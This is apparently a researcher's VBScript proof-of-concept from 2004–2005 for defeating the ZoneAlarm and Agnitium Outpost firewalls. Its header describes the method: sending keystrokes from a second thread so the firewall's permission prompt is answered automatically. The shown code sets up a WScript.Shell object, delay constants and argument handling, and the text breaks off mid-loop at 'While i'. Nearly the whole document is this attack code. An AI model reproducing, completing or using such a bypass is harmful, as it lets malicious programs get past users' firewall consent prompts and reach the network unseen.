'*********************************************************** '// By Ferruh Mavituna '// ferruh{@}mavituna.com, http://ferruh.mavituna.com '*********************************************************** '// Date : 4/25/2004 '// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading '// Related Advisory : NOT PUBLISHED YET '*********************************************************** 'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314) 'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369) '5/5/2004 '02.01.2005 'Ferruh Mavituna 'Const DELAY = 1000 'Const TIMES = 1 'Const EXTRADELAY = 0 '*********************************************************** Option Explicit Dim argLen, shell, sendKeyMod, i, appName Const DELAY = 1000 Const TIMES = 1 Const EXTRADELAY = 0 appName = Wscript.ScriptName 'SendKey sendkeyMod = False argLen = WScript.Arguments.Length If argLen>0 Then sendkeyMod = True Set shell = WScript.CreateObject("WScript.Shell") If sendKeyMod Then 'First Sleep for a while If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY 'Force While i